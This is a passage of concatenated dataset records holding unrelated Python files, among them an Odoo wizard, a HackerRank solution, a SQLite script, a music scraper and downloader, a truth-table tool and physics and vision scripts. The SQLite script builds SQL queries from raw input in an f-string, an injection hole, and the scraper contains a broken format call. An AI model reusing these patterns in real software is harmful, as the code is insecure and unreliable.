move.id,\n 'partner': obj.check_partner.id,\n 'note': self.note,\n }\n operation = self.env['account.check.operation.nr'].create(operation_values)\n\n obj.write({\n 'state': 'handed_to_partner',\n 'operation_ids': [(4, operation.id)],\n })\n\n\n","sub_path":"checks/wizards/handed_to_partner_nr_wizard.py","file_name":"handed_to_partner_nr_wizard.py","file_ext":"py","file_size_in_byte":2667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"597409062","text":"from __future__ import print_function\r\nimport os\r\nimport sys\r\n\r\n\r\ndef flatlandSpaceStations(n, c):\r\n op = [0] * n\r\n c = sorted(c)\r\n i = 0\r\n left = None\r\n right = c[i]\r\n for _ in range(n):\r\n if left == None:\r\n tmp = abs(_ - right)\r\n op[_] = tmp\r\n elif left != None and right != None:\r\n tmp = min(abs(_ - left), abs(_ - right))\r\n op[_] = tmp\r\n elif right == 
None:\r\n tmp = abs(_ - left)\r\n op[_] = tmp\r\n # print(_, i, \"left:\", left , \"right:\", right, \"op:\", tmp)\r\n if _ == left or _ == right:\r\n i += 1\r\n tmp = c[i] if i < len(c) else None\r\n left, right = right, tmp\r\n return max(op)\r\n\r\n\r\nif __name__ == '__main__':\r\n f = open('./input.txt')\r\n nm = f.readline().strip().split()\r\n n = int(nm[0])\r\n m = int(nm[1])\r\n c = map(int, f.readline().strip().rstrip().split())\r\n result = flatlandSpaceStations(n, list(c))\r\n print(result)\r\n","sub_path":"hackerrank/algorithms/implementation/flatland-space-stations.py","file_name":"flatland-space-stations.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"529089258","text":"import sqlite3 as sq\n\n\n\ndef cadastraUsuatio(nome, idade, email):\n \n banco = sq.connect('database.db')\n cursor = banco.cursor()\n cursor.execute(f'INSERT INTO pessoas VALUES(\"{nome}\",\"{idade}\",\"{email}\")')\n\n banco.commit() \n print(cursor.fetchall())\n return {'id' : 1,'nome': nome,'idade': idade,'email' : email}\n\n'''\ndef criar_database():\n\n banco = sq.connect('database.db')\n cursor = banco.cursor()\n cursor.execute('CREATE TABLE pessoas (nome text , idade integer , email text)')\n'''\n\nbanco = sq.connect('database.db')\ncursor = banco.cursor()\ncursor.execute('SELECT * FROM pessoas')\nprint(cursor.fetchall())","sub_path":"Treinamento/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"242172444","text":"\"\"\"MCTV JSON HANDLER\"\"\"\nimport json\n\ndef openjson(filename):\n \"\"\"opens the json file \"filename\" and\n returns a python object with the content of that file\"\"\"\n f1 = open(filename,\"r\")\n lines = f1.readlines()\n f1.close()\n lines = \"\".join(lines).replace(\"\\n\",\"\")\n jsn = json.loads(lines)\n return jsn\n\ndef newjson(dic):\n \"\"\"takes a dictionary and returns a json object with the main\n MCTV things defined.\n The dictionary contains:\n \"height\" (REQUIRED) height of the images\n \"width\" (REQUIRED) width of the images\n \"densmin\" (optional) density value of minimum pixel value (defaults to 0)\n \"densmax\" (optional) density value of maximum pixel value (defaults to 255)\n \"densunit\" (optional) unit of density values (defaults to 8-bit)\n \"res\" (optional) resolution per pixel in-plane\n \"zres\" (optional) resolution per pixel inter-planes\n \"resunits\" (optional) units of the resolution (defaults to micro-meter)\n\"\"\"\n jsn = {\"height\":dic[\"height\"],\"width\":dic[\"width\"],\"slides\":[]}\n if \"densmin\" in dic:\n jsn[\"densmin\"] = dic[\"densmin\"]\n else:\n jsn[\"densmin\"] = 0\n if \"densmax\" in dic:\n jsn[\"densmax\"] = dic[\"densmax\"]\n else:\n jsn[\"densmax\"] = 255\n if \"densunit\" in dic:\n jsn[\"densunit\"] = dic[\"densunit\"]\n else:\n jsn[\"densunit\"] = \"8-bit\"\n if \"res\" in dic:\n jsn[\"res\"] = dic[\"res\"]\n else:\n jsn[\"res\"] = 1\n if \"zres\" in dic:\n jsn[\"zres\"] = dic[\"zres\"]\n else:\n jsn[\"zres\"] = 1\n if \"resunits\" in dic:\n jsn[\"resunits\"] = dic[\"resunits\"]\n else:\n jsn[\"resunits\"] = \"px\"\n return jsn\n\n\ndef addslide(jsn,path,jid=0,height=0,width=0):\n \"\"\"add a slide to the jsonInfo.txt replacing the job-id specified\n or sorting it by name, returning the json object with the added slide\"\"\"\n if width == 0:\n width = jsn[\"width\"]\n if height == 0:\n height = 
jsn[\"height\"]\n path = path.replace(\"\\\\\",\"/\").replace(\"//\",\"/\").lstrip(\"/\")+\"/\"\n path = path.replace(\"C:/data\",\"../data\").replace(\"c:/data\",\"../data\")\n slide = {\"path\":path, \"height\":height, \"width\":width}\n slides = jsn[\"slides\"]\n if jid == 0: #old case - no job id provided\n newslides = []\n cntr = 0\n hasAppended = False\n for s in slides:\n if s[\"path\"] < slide[\"path\"]:\n newslides.append(s)\n else:\n newslides.append(slide)\n newslides += slides[cntr:]\n hasAppended = True\n break\n cntr += 1\n if not hasAppended:\n newslides.append(slide)\n else: #new solution: replace slide with same jobid\n newslides = slides\n cntr = 0\n slideid=len(slides)\n for s in slides:\n if s[\"path\"] == None:\n if s[\"jobid\"] == jid:\n slideid = cntr\n break\n cntr += 1\n if slideid != len(slides):\n newslides[slideid] = slide\n jsn[\"slides\"] = newslides\n return jsn\n\ndef addid(jsn,jid,path=None):\n \"\"\"add slide with job-id\"\"\"\n width = jsn[\"width\"]\n height = jsn[\"height\"]\n if path != None:\n path = path.replace(\"\\\\\",\"/\").replace(\"//\",\"/\").lstrip(\"/\")+\"/\"\n path = path.replace(\"C:/data\",\"../data\").replace(\"c:/data\",\"../data\")\n slide = {\"jobid\":jid, \"path\":path, \"height\":height, \"width\":width}\n slides = jsn[\"slides\"]\n newslides = slides\n newslides.append(slide)\n jsn[\"slides\"] = newslides\n return jsn\n\n\ndef writejson(filename,jsn):\n \"\"\"write json object to file\"\"\"\n f1 = open(filename,\"w\")\n f1.write(json.dumps(jsn, indent=4, separators=(',', ': ')))\n f1.close()\n return None\n\nif __name__ == \"__main__\":\n \"\"\"run tests\"\"\"\n jsn = openjson(\"testing\\\\tiles\\\\SFCT\\\\JSONinfo.txt\")\n addslide(jsn,\"../MCTV/exampleblock/_00185\")\n writejson(\"testing\\\\tiles\\\\SFCT\\\\JSONinfo.txt\",jsn)\n","sub_path":"tiler/jsonhandler.py","file_name":"jsonhandler.py","file_ext":"py","file_size_in_byte":3962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"144133272","text":"import requests\nfrom lxml import html as _html\nimport re\nfrom pymplay.MusicPlayer import MusicPlayer\nimport io\nimport os\nfrom downloadsdotnl.config import config\nimport urllib.request\n\n\nclass Searcher(object):\n\n def __init__(self):\n self.base_url = 'http://www.downloads-nl.com/results/mp3/{}/{}'\n self.s = requests.Session()\n self.player = MusicPlayer()\n\n \n def send_request(self, page, query):\n r = self.s.get(\n self.base_url.format(page, query),\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))' \n },\n allow_redirects=True\n )\n\n return r\n\n \n def get_songs(self, page, query):\n doc = _html.fromstring(self.send_request(page, query).text)\n song_urls = doc.xpath(\".//a[@class='tl j-lnk']/@href\")\n files = []\n \n print('Query: {}'.format(query, page))\n \n for url in song_urls:\n full_url = 'http://www.downloads-nl.com/{}&p=1'.format(url)\n \n r = self.s.get(\n full_url,\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT \\\n 9.0; en-US))' \n },\n allow_redirects=True\n )\n \n try:\n m = re.search(\"'Play\\'.'(https?:\\/\\/(?:www\\.|(?!www))[^\\s\\.]+\\.[^\\s]{2,}|www\\.[^\\s]+\\.[^\\s]{2,})'\", r.text).group(1)\n files.append(m)\n except AttributeError:\n pass\n\n print('Found: {} songs on page {}'.format(len(files)), page)\n \n for file in files:\n real_file = '{}/{}'.format(config['download']['dir'], os.path.basename(file))\n print('Saving: {}'.format(real_file))\n \n r = self.s.get(\n 
file,\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT \\\n 9.0; en-US))' \n },\n allow_redirects=True,\n stream=True\n )\n\n with open(real_file, 'wb') as f:\n for chunk in r.iter_content(chunk_size=1024): \n if chunk:\n f.write(chunk)\n\n self.player.play_audio(real_file)\n","sub_path":"build/lib/downloadsdotnl/Searcher.py","file_name":"Searcher.py","file_ext":"py","file_size_in_byte":2363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"270199612","text":"import os\r\ntry:\r\n import pandas as pd\r\n import openpyxl\r\n importBool = True\r\n \r\nexcept ImportError:\r\n print(\"Could not find pandas or openpyxl, please download them using pip if you want to export to excel.\")\r\n importBool = False\r\n\r\n\r\n#Creation of lists to store position______________________________________\r\ndef offsetin(input_dic):\r\n position = 40*(2**(len(input_dic.keys())))\r\n global endpoint; endpoint = position\r\n for i in input_dic.keys():\r\n position //= 2\r\n input_dic[i] = [position,0]\r\n\r\n\r\n#findingAmountOfOperations________________________________________________\r\ndef paranumfunc(str):\r\n counter = 0\r\n for i in str:\r\n if i == '(':\r\n counter += 1\r\n return counter\r\n\r\n#listOfOperators__________________________________________________________\r\ndef xorfunc(a,b):\r\n if (a == 1 and b ==0) or (a == 0 and b ==1):\r\n return 1\r\n else:\r\n return 0\r\n\r\ndef andfunc(a,b):\r\n if (a == 1 and b == 1):\r\n return 1\r\n else:\r\n return 0\r\n\r\ndef orfunc(a,b):\r\n if (a == 0 and b == 0):\r\n return 0\r\n else:\r\n return 1\r\ndef imfunc(a,b):\r\n if (a == 1 and b == 0):\r\n return 0\r\n else:\r\n return 1\r\n\r\ndef nefunc(a):\r\n if a ==1:\r\n return 0\r\n else:\r\n return 1\r\n\r\ndef ouexfunc(a,b):\r\n if (a == 1 and b ==0) or (a == 0 and b ==1):\r\n return 1\r\n else:\r\n return 0\r\n\r\ndef bifunc(a,b):\r\n if (a==1 and b==1) or (a==0 and b==0):\r\n return 1\r\n else:\r\n return 0\r\n\r\ndef nandfunc(a,b):\r\n if (a == 1 and b==1):\r\n return 0\r\n else:\r\n return 1\r\n\r\n#findingExcutions__________________________________________________________\r\ndef findParentheses(string,paraNum,input_dic):\r\n for j in range(paraNum):\r\n curo = ''\r\n nexto = ''\r\n for i in range(len(string)):\r\n if string[i] ==\")\":\r\n nexto = i\r\n evaluate = string[curo+1:nexto].split()\r\n\r\n if evaluate[1] == 'and':\r\n result = andfunc(input_dic[evaluate[0]][1],input_dic[evaluate[2]][1])\r\n var = 'variableNumber' + str(j)\r\n exec('input_dic[var]= [\"null\",result]')\r\n string = string[0:curo] + var + string[nexto + 1:]\r\n \r\n elif evaluate[1] == 'or':\r\n result = orfunc(input_dic[evaluate[0]][1],input_dic[evaluate[2]][1])\r\n var = 'variableNumber' + str(j)\r\n exec('input_dic[var]= [\"null\",result]')\r\n string = string[0:curo] + var + string[nexto + 1:]\r\n\r\n elif evaluate[1] == 'im':\r\n result = imfunc(input_dic[evaluate[0]][1],input_dic[evaluate[2]][1])\r\n var = 'variableNumber' + str(j)\r\n exec('input_dic[var]= [\"null\",result]')\r\n string = string[0:curo] + var + string[nexto + 1:]\r\n\r\n elif evaluate[0] == 'ne':\r\n result = nefunc(input_dic[evaluate[1]][1])\r\n var = 'variableNumber' + str(j)\r\n exec('input_dic[var]= [\"null\",result]')\r\n string = string[0:curo] + var + string[nexto + 1:]\r\n\r\n elif evaluate[1] == 'ouex':\r\n result = ouexfunc(input_dic[evaluate[0]][1],input_dic[evaluate[2]][1])\r\n var = 'variableNumber' + str(j)\r\n exec('input_dic[var]= 
[\"null\",result]')\r\n string = string[0:curo] + var + string[nexto + 1:]\r\n\r\n elif evaluate[1] == 'xor':\r\n result = xorfunc(input_dic[evaluate[0]][1],input_dic[evaluate[2]][1])\r\n var = 'variableNumber' + str(j)\r\n exec('input_dic[var]= [\"null\",result]')\r\n string = string[0:curo] + var + string[nexto + 1:]\r\n\r\n elif evaluate[1] == 'bi':\r\n result = bifunc(input_dic[evaluate[0]][1],input_dic[evaluate[2]][1])\r\n var = 'variableNumber' + str(j)\r\n exec('input_dic[var]= [\"null\",result]')\r\n string = string[0:curo] + var + string[nexto + 1:]\r\n\r\n elif evaluate[1] == 'nand':\r\n result = nandfunc(input_dic[evaluate[0]][1],input_dic[evaluate[2]][1])\r\n var = 'variableNumber' + str(j)\r\n exec('input_dic[var]= [\"null\",result]')\r\n string = string[0:curo] + var + string[nexto + 1:]\r\n break\r\n\r\n elif string[i] ==\"(\":\r\n curo = i\r\n\r\n finalValue = input_dic[var][1]\r\n return finalValue\r\n\r\n\r\n#inputSettings_____________________________________________________________\r\ndef inputSettings(finalInfo, unitTime,locallist,input_dic):\r\n \r\n for key in locallist:\r\n if unitTime == 0:\r\n input_dic[key][1] = 0\r\n elif (int(unitTime)%int(input_dic[key][0])) == 0:\r\n input_dic[key][1] = 0\r\n elif unitTime%(input_dic[key][0]//2) == 0:\r\n input_dic[key][1] = 1\r\n\r\n#printVariableInformation__________________________________________________\r\ndef printVarInfo(finalInfo):\r\n for j in range(len(finalInfo[0][1])):\r\n print(\"The values under column #: \" + str(j+1))\r\n for i in range(finalInfo[-1][0]+1):\r\n print(finalInfo[i][1][j])\r\n print()\r\n\r\n#printMatrixInformation___________________________________________________\r\ndef printResInfo(finalInfo):\r\n print(\"Here are the results for the command:\")\r\n for i in range(finalInfo[-1][0]+1):\r\n print(str(finalInfo[i][2][0]))\r\n\r\n#storeInformationInMatrix__________________________________________________\r\ndef matrixMake(command, paraNum, endpoint, finalInfo,input_dic):\r\n currentpoint = 0\r\n count = 0\r\n locallist = []\r\n for key in input_dic.keys():\r\n if key == 'varialbeNumber0':\r\n break\r\n else:\r\n locallist.append(key)\r\n\r\n for i in range(endpoint//40):\r\n finalInfo.append([count,[],[]])\r\n for j in locallist:\r\n inputSettings(finalInfo, currentpoint,locallist,input_dic)\r\n finalInfo[count][1].append(input_dic[j][1])\r\n finalInfo[count][2].append(findParentheses(command,paraNum,input_dic))\r\n\r\n count +=1\r\n currentpoint += 20\r\n\r\n#exportingInformationToExcel_______________________________________________\r\ndef exportExcel(importBool, finalInfo):\r\n '''Loop to ask if they want to export file to excel'''\r\n given = False\r\n while given == False:\r\n ans = input('Do you wish to export this command to excel? 
y or n: ')\r\n ans = ''.join(ans.split())\r\n ans.lower()\r\n print(ans)\r\n if ans == 'n':\r\n given = True\r\n elif ans == 'y':\r\n\r\n excelDic = {}\r\n excelColumn = []\r\n\r\n for j in range(len(finalInfo[0][1])):\r\n excelDic[str(j+1)] = []\r\n for i in range(finalInfo[-1][0]+1):\r\n excelDic[str(j+1)].append(finalInfo[i][1][j])\r\n\r\n excelDic['Final'] = []\r\n for i in range(finalInfo[-1][0]+1):\r\n excelDic['Final'].append((finalInfo[i][2][0]))\r\n \r\n for keys in excelDic.keys():\r\n excelColumn.append(keys)\r\n\r\n pf = pd.DataFrame(excelDic, columns = excelColumn)\r\n \r\n excelfile = (input('Please enter the excel file name: '))\r\n newFile = (os.path.join((os.path.dirname(os.path.abspath(__file__))), (excelfile + str('.xlsx'))))\r\n\r\n \r\n '''if os.path.isfile('filename.txt'):\r\n print (\"File exist\")\r\n os.remove(excelfile)'''\r\n \r\n check = False\r\n counter = 1\r\n while check == False:\r\n try:\r\n pf.to_excel(newFile, index = False, header=True)\r\n check = True\r\n except:\r\n newexcelfile = excelfile + str(counter)\r\n newFile = (os.path.join((os.path.dirname(os.path.abspath(__file__))), (newexcelfile + str('.xlsx'))))\r\n counter += 1\r\n \r\n \r\n given = True\r\n\r\n\r\n#mainProgram_______________________________________________________________\r\ndef me(input_dic,finalInfo,importBool):\r\n menu = True\r\n while menu == True:\r\n input_dic = {}\r\n finalInfo = []\r\n\r\n command = input(\"Please input the command: \")\r\n '(a and b)[a,b]'\r\n check = True\r\n counter = 0\r\n bracketCheck = False\r\n\r\n if '[' in command:\r\n bracketCheck = True\r\n\r\n while check == True:\r\n if command[counter] == '[':\r\n variables = command[counter+1:-1]\r\n command = command[:counter]\r\n check = False\r\n if counter == len(command)-2:\r\n check = False\r\n counter +=1\r\n\r\n if bracketCheck == True:\r\n variableList = variables.split()\r\n for i in variableList:\r\n input_dic[i]= []\r\n else:\r\n for i in range(len(command)):\r\n if command[i] ==\"(\":\r\n if command[i+1] != \"(\":\r\n input_dic[command[i+1]] = []\r\n if command[i] == \")\":\r\n if command[i-1] !=\")\":\r\n input_dic[command[i-1]] = []\r\n\r\n '''Create the cycles for each variable'''\r\n offsetin(input_dic)\r\n\r\n '''Detect amount of operations'''\r\n paraNum = paranumfunc(command)\r\n\r\n '''Simulate every iteration and storing information into input_dic and finalInfo'''\r\n matrixMake(command, paraNum, endpoint, finalInfo, input_dic)\r\n\r\n '''Go through the different main options''' \r\n ask = True\r\n while ask:\r\n printOptions = input(\"Here are the different options\\n1 for variable printout\\n2 for result printout\\n3 for new command\\n'end' to stop the program\\n->\")\r\n \r\n if printOptions == '1':\r\n printVarInfo(finalInfo)\r\n elif printOptions == '2':\r\n printResInfo(finalInfo)\r\n if importBool == True:\r\n exportExcel(importBool,finalInfo)\r\n elif printOptions == '3':\r\n ask = False\r\n elif printOptions == 'end':\r\n ask = False\r\n menu = False\r\n else:\r\n print(\"You have inputed a wrong option, please select an available option!\\n\")\r\n\r\n#ProgramStartup_____________________________________________________________\r\ndef m():\r\n '''initialize main variable'''\r\n input_dic = {}\r\n finalInfo = []\r\n me(input_dic,finalInfo,importBool)\r\n\r\nm()\r\n","sub_path":"truthTable/truthTableV1_5.py","file_name":"truthTableV1_5.py","file_ext":"py","file_size_in_byte":10885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} 
+{"seq_id":"325034019","text":"from pytransform3d.transform_manager import TransformManager\nfrom pytransform3d import transformations as pt\nfrom pytransform3d import rotations as pr\nfrom pytransform3d import batch_rotations as br\nfrom pytransform3d import *\nimport matplotlib.pyplot as plt\nimport cv2\nimport numpy as np\nimport math\nfrom scipy.spatial.transform import Rotation as R\n\n\n# https://en.wikipedia.org/wiki/Image_rectification\n# https://www.sci.utah.edu/~gerig/CS6320-S2013/Materials/CS6320-CV-F2012-Rectification.pdf\n# https://www.cs.cmu.edu/~16385/s17/Slides/13.1_Stereo_Rectification.pdf\n# https://docs.opencv.org/3.4/d9/d0c/group__calib3d.html\n# https://docs.opencv.org/3.4/d9/d0c/group__calib3d.html#ga617b1685d4059c6040827800e72ad2b6\n\n\n# Z Z\n# ▲ ▲\n# / \\\n# / \\\n# /1 2 3 4 X \\ 1 2 3 4\n# Left Cam |------------ ⯈ |------------ ⯈Right cam\n# 1| 1 |\n# 2| 2 |\n# 3| 3 |\n# Y | Y |\n# ⯆ ⯆\n\n\n# Z ▲\n# | ▲ Y\n# 4| /3\n# 3| /2\n# 2| /1\n# world 1|------------ ⯈ X\n# 1 2 3 4 5\n#\n#\n#\n#\n\n\ndef rotationMatrix(roll, pitch, yaw):\n yawMatrix = np.matrix([\n [math.cos(yaw), -math.sin(yaw), 0],\n [math.sin(yaw), math.cos(yaw), 0],\n [0, 0, 1]\n ])\n\n pitchMatrix = np.matrix([\n [math.cos(pitch), 0, math.sin(pitch)],\n [0, 1, 0],\n [-math.sin(pitch), 0, math.cos(pitch)]\n ])\n\n rollMatrix = np.matrix([\n [1, 0, 0],\n [0, math.cos(roll), -math.sin(roll)],\n [0, math.sin(roll), math.cos(roll)]\n ])\n\n R = yawMatrix * pitchMatrix * rollMatrix\n return R\n\n\ndef creatingEllipsoidInWorldCoordinate(center_x, center_y, center_z, a=2, b=3, c=1.6):\n phiStepSize = 0.10\n thetaStepSize = 0.20\n objectPointsInWorldCoordinate = []\n\n for phi in np.arange(-np.pi, np.pi, phiStepSize):\n for theta in np.arange(-np.pi / 2, np.pi / 2, thetaStepSize):\n X = a * np.cos(theta) * np.cos(phi)+center_x\n Y = b * np.cos(theta) * np.sin(phi)+center_y\n Z = c * np.sin(theta)+center_z\n objectPointsInWorldCoordinate.append(np.array([X, Y, Z]))\n\n return np.array(objectPointsInWorldCoordinate)\n\n\nroll_cam0 = -np.pi / 2\npitch_cam0 = +np.pi / 36\nyaw_cam0 = 0.0\nrotationMatrix_cam0 = rotationMatrix(roll_cam0, pitch_cam0, yaw_cam0)\n\nt0_x = -0.75\nt0_y = -1.0\nt0_z = 1.0\n\n\nt_cam0 = np.array([[t0_x],\n [t0_y],\n [t0_z]])\n\n\ncam0_in_world = pt.transform_from(rotationMatrix_cam0, t_cam0.ravel())\n\nprint(\"cam0_in_world\\n:\", cam0_in_world)\n\nr = R.from_matrix([[1, 0, 0],\n [0, 0, 1],\n [0, -1, 0]])\n\n# print(\"yaw, pitch, roll: \", r.as_euler('zyx', degrees=True))\n# print(\"-----------------------\")\n\n\nroll_cam1 = -np.pi / 2\npitch_cam1 = -np.pi / 36\nyaw_cam1 = 0.0\n\nrotationMatrix_cam1 = rotationMatrix(roll_cam1, pitch_cam1, yaw_cam1)\n\nt1_x = +0.75\nt1_y = -1.0\nt1_z = 1.0\n\n\nt_cam1 = np.array([[t1_x],\n [t1_y],\n [t1_z]])\n\n\ncam1_in_world = pt.transform_from(rotationMatrix_cam1, t_cam1.ravel())\n\nprint(\"cam1_in_world\\n:\", cam1_in_world)\n\ntm = TransformManager()\n\ntm.add_transform(\"cam0\", \"world\", cam0_in_world)\ntm.add_transform(\"cam1\", \"world\", cam1_in_world)\n\nax = tm.plot_frames_in(\"world\", s=.5)\n\n\nax.set_xlim((-5, 5))\nax.set_ylim((-5, 5))\nax.set_zlim((0, 5))\n\nobjectPointsInWorldCoordinate = creatingEllipsoidInWorldCoordinate(\n center_x=0, center_y=4, center_z=1.1, a=2, b=3/5, c=1.6/5)\n\nax.scatter(objectPointsInWorldCoordinate[:, 0],\n objectPointsInWorldCoordinate[:, 1], objectPointsInWorldCoordinate[:, 2])\n\n\n# camera intrinsic parameters\n\n\nfocalLength = 2.0\nnumberOfPixelInHeight = 600\nnumberOfPixelInWidth = 600\n\nheightOfSensor = 
10\nwidthOfSensor = 10\n\nmy = (numberOfPixelInHeight) / heightOfSensor\nU0 = (numberOfPixelInHeight) / 2\n\nmx = (numberOfPixelInWidth) / widthOfSensor\nV0 = (numberOfPixelInWidth) / 2\n\n\nK = np.array([\n [focalLength * mx, 0, V0],\n [0, focalLength * my, U0],\n [0, 0, 1]\n ])\n\n\nprint(\"K:\\n\", K)\n\ndistCoeffs = np.array([0.0, 0.0, 0.0, 0.0])\n\n\nimagePoints_cam0, jacobian = cv2.projectPoints(\n objectPointsInWorldCoordinate, np.linalg.inv(rotationMatrix_cam0), -t_cam0, K, distCoeffs)\n\n\nleftImage = np.zeros([numberOfPixelInHeight, numberOfPixelInWidth])\nfor pixel_coordinate in imagePoints_cam0:\n U = int(pixel_coordinate[0, 0])\n V = int(pixel_coordinate[0, 1])\n leftImage[V, U] = 1\n\n\nimagePoints_cam1, jacobian = cv2.projectPoints(\n objectPointsInWorldCoordinate, np.linalg.inv(rotationMatrix_cam1), -t_cam1, K, distCoeffs)\n\nrightImage = np.zeros([numberOfPixelInHeight, numberOfPixelInWidth])\nfor pixel_coordinate in imagePoints_cam1:\n U = int(pixel_coordinate[0, 0])\n V = int(pixel_coordinate[0, 1])\n rightImage[V, U] = 1\n\n\ncam1_in_cam0 = tm.get_transform(\"cam1\", \"cam0\")\nprint(\"cam1_in_cam0:\\n\", cam1_in_cam0)\n\nR = np.zeros([3, 3])\nT = np.zeros([3, 1])\nprint(\"T:\\n\", t_cam1-t_cam0)\n\nR = cam1_in_cam0[0:3, 0:3]\nT = cam1_in_cam0[0:3, 3]\n\nprint(R)\nprint(T)\n\n\n######################## stereoCalibrate ########################\n\n# cv.stereoCalibrate(\tobjectPoints, imagePoints1, imagePoints2, cameraMatrix1, distCoeffs1, cameraMatrix2, distCoeffs2, imageSize[, R[, T[, E[, F[, flags[, criteria]]]]]]\t) ->\tretval, cameraMatrix1, distCoeffs1, cameraMatrix2, distCoeffs2, R, T, E, F\n\n\n######################## stereoRectify ########################\n\n\nR1, R2, P1, P2, Q, validPixROI1, validPixROI2 = cv2.stereoRectify(\n cameraMatrix1=K, distCoeffs1=distCoeffs, cameraMatrix2=K, distCoeffs2=distCoeffs, imageSize=(600, 600), R=R, T=T)\n\n# print(\"R1, R2, P1, P2, Q, validPixROI1, validPixROI2:\\n\",\n# R1, R2, P1, P2, Q, validPixROI1, validPixROI2)\n\n\nprint(\"R1: (rotation matrix) for the first camera, brings points given in the unrectified first camera's coordinate system to points in the rectified first camera's coordinate system:\\n\", R1)\n\nprint(\"R2: (rotation matrix) for the second camera, brings points given in the unrectified second camera's coordinate system to points in the rectified second camera's coordinate system:\\n\", R2)\n\nprint(\"P1: projects points given in the rectified first camera coordinate system into the rectified first camera's image:\\n\", P1)\n\nprint(\"P2: projects points given in the rectified first camera coordinate system into the rectified second camera's image.:\\n\", P2)\n\n\n# essential_matrix_estimation\ncv2.imshow('leftImage', leftImage)\ncv2.imshow('rightImage', rightImage)\nplt.show()\n\n\n######################## initUndistortRectifyMap ########################\n\n\n# The function computes the joint undistortion and rectification transformation and represents the result in the form of maps for remap.\nmap1, map2 = cv2.initUndistortRectifyMap(\n K, distCoeffs, R1, P1, size=(600, 600), m1type=cv2.CV_32FC1)\n\nprint(\"map1 :\\n\", map1.shape)\n\nprint(\"map2 :\\n\", map2.shape)\n\ncv2.waitKey(0)\n","sub_path":"scripts/image_rectification.py","file_name":"image_rectification.py","file_ext":"py","file_size_in_byte":7470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"251346277","text":"class Solution:\n \"\"\"\n @param nums: an array of integers\n @return: the 
number of unique integers\n \"\"\"\n\n # O(nlog(n)) time, O(1) space\n def deduplication(self, nums):\n # write your code here\n if not nums:\n return 0\n\n count = 1\n nums.sort()\n\n for i in range(1, len(nums)):\n if nums[i - 1] != nums[i]:\n nums[count] = nums[i]\n count += 1\n\n return count\n\n # O(n) time and space\n # def deduplication(self, nums):\n # # write your code here\n # count = 0\n # hash_set = set()\n # for num in nums:\n # if num not in hash_set:\n # hash_set.add(num)\n # nums[count] = num\n # count += 1\n\n # return count","sub_path":"521_Remove Duplicate Numbers in Array.py","file_name":"521_Remove Duplicate Numbers in Array.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"68663431","text":"## Job options file for Geant4 Simulations\n\n## Algorithm sequence\nfrom AthenaCommon.AlgSequence import AlgSequence\njob = AlgSequence()\n\n## Output printout level\nServiceMgr.MessageSvc.OutputLevel = INFO\n\nfrom PerfMonComps.PerfMonFlags import jobproperties\njobproperties.PerfMonFlags.doMonitoring = True\n\n## Detector flags\nfrom AthenaCommon.DetFlags import DetFlags\nDetFlags.ID_setOn()\nDetFlags.Calo_setOn()\nDetFlags.Muon_setOff()\nDetFlags.Truth_setOn()\n\n## AthenaCommon flags\nfrom AthenaCommon.AthenaCommonFlags import athenaCommonFlags\nathenaCommonFlags.PoolHitsOutput.set_Off()\nif 'EvtMax' not in dir():\n EvtMax=150\nathenaCommonFlags.EvtMax = EvtMax\n\n## Set global conditions tag\nfrom AthenaCommon.GlobalFlags import globalflags\nglobalflags.ConditionsTag = \"OFLCOND-RUN12-SDR-19\"\n#globalflags.DetDescrVersion = 'ATLAS-R2-2015-03-01-00'\n\n## Simulation flags\nathenaCommonFlags.PoolEvgenInput.set_Off()\nathenaCommonFlags.SkipEvents.set_Off()\nfrom G4AtlasApps.SimFlags import simFlags\nsimFlags.load_atlas_flags()\nsimFlags.SimLayout.set_On()\nsimFlags.SimLayout='ATLAS-R2-2015-03-01-00_VALIDATION'\n\n## Enable the EtaPhi, VertexSpread and VertexRange checks\nsimFlags.EventFilter.set_On()\n\n## Use single particle generator\nimport AthenaCommon.AtlasUnixGeneratorJob\nimport ParticleGun as PG\npg = PG.ParticleGun(randomSvcName=simFlags.RandomSvc.get_Value(), randomStream=\"SINGLE\")\npg.sampler.pid = PG.CyclicSeqSampler([-211,211])\npg.sampler.mom = PG.PtEtaMPhiSampler(pt=50000, eta=[-4,4])\njob += pg\n\ninclude(\"G4AtlasApps/fragment.SimCopyWeights.py\")\n\n## Release GeoModel memory once sim is configured\nsimFlags.ReleaseGeoModel = False\n\ninclude(\"G4AtlasApps/G4Atlas.flat.configuration.py\")\n\n\n## Add the G4 sim to the alg sequence after the generator\nfrom AthenaCommon.CfgGetter import getAlgorithm\njob += getAlgorithm(\"G4AtlasAlg\",tryDefaultConfigurable=True)\n\n\n## User algorithms\nfrom AthenaCommon.AppMgr import ServiceMgr\nfrom GaudiSvc.GaudiSvcConf import THistSvc\nServiceMgr += THistSvc(\"THistSvc\")\n#ServiceMgr.THistSvc.Output = [\"atlasTest DATAFILE='atlasTest.muons.histo.root' OPT='RECREATE'\"];\n\nServiceMgr.THistSvc.Output = [\"truth DATAFILE='truth.root' OPT='RECREATE'\"];\n\nfrom AthenaCommon.AlgSequence import AlgSequence\njob = AlgSequence()\n\nfrom G4AtlasTests.G4AtlasTestsConf import G4TestAlg\njob += G4TestAlg()\nfrom AthenaCommon import CfgGetter\njob.G4TestAlg.SimTestTools += [CfgGetter.getPrivateTool(\"TruthTestTool\", checkType=True)]\njob.G4TestAlg.SimTestTools += [CfgGetter.getPrivateTool(\"EvgenTruthTestTool\", checkType=True)] \njob.G4TestAlg.SimTestTools += 